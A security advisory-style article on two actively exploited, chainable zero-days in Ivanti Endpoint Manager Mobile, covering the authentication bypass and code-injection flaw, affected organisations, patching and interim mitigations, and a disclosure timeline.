Two critical zero-day vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) are under active mass exploitation, and CISA has now added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog as of April 8, 2026. Federal agencies face a remediation deadline of April 13. If you run EPMM anywhere in your environment, stop reading and start patching.
What Happened
Ivanti disclosed CVE-2026-1281 and CVE-2026-1340 after confirming both were being exploited as zero-days in the wild. The vulnerabilities affect Ivanti Endpoint Manager Mobile, a widely deployed mobile device management (MDM) platform used by enterprises and government agencies to manage corporate mobile devices, enforce policies, and distribute applications.
The flaws can be chained together. CVE-2026-1281 is an authentication bypass, and CVE-2026-1340 is a code injection vulnerability. Together, they give an unauthenticated remote attacker full code execution on the EPMM appliance.
Technical Details
CVE-2026-1340 (CVSS 9.8) is rooted in CWE-94 (Improper Control of Generation of Code). The vulnerability exists because EPMM fails to properly sanitize user-supplied input before incorporating it into executable code constructs. Specifically, the flaw resides in how Bash scripts used by EPMM handle attacker-controlled input through arithmetic expansion in the map-appstore-url script. An attacker can break out of the intended data context and inject arbitrary code that the system executes with the privileges of the EPMM application process.
CVE-2026-1281 is the authentication bypass that makes CVE-2026-1340 reachable without credentials. The combination is what makes this chain particularly dangerous: no authentication required, no user interaction needed, and the attack vector is network-based.
The attack characteristics:
- Vector: Network-based, no authentication, no user interaction
- Complexity: Low
- Impact: Full system compromise — arbitrary command execution with application-level privileges
- PoC Status: Public proof-of-concept code is available from multiple sources including Horizon3.ai and watchTowr
Who Is Affected
Any organization running Ivanti Endpoint Manager Mobile (formerly MobileIron Core) that is exposed to the network. EPMM is commonly deployed in enterprises and government agencies for MDM. Given that MDM platforms by design have deep access to managed devices — including the ability to push configurations, install apps, and wipe devices — a compromised EPMM server represents a significant pivot point into an organization’s entire mobile fleet.
Telekom Security and Palo Alto Unit 42 have both reported observing mass exploitation attempts against Internet-facing EPMM instances. With public PoC code circulating, opportunistic scanning and exploitation will only increase.
Mitigation
Patch immediately. Ivanti has released RPM hotfixes:
- Apply RPM 12.x.0.x or RPM 12.x.1.x depending on your current EPMM version
- Only one RPM is required per version
- A permanent fix is expected in EPMM version 12.8.0.0
If you cannot patch immediately:
- Restrict network access to the EPMM management interface. It should not be exposed to the public Internet. Place it behind a VPN or firewall with strict ACLs.
- Monitor for exploitation indicators. Review EPMM logs for unexpected command execution, unusual API calls to the
map-appstore-urlendpoint, and any signs of post-exploitation activity (new accounts, modified configurations, unexpected outbound connections). - Assume compromise if unpatched and exposed. If your EPMM instance has been Internet-facing without the patch, conduct a thorough investigation before simply applying the fix. Check for persistence mechanisms, lateral movement, and data exfiltration.
Timeline
- Early 2026: Ivanti confirms zero-day exploitation of CVE-2026-1281 and CVE-2026-1340
- March 2026: Mass exploitation observed by Telekom Security and Unit 42
- April 8, 2026: CISA adds CVE-2026-1340 to the KEV catalog
- April 13, 2026: CISA remediation deadline for federal agencies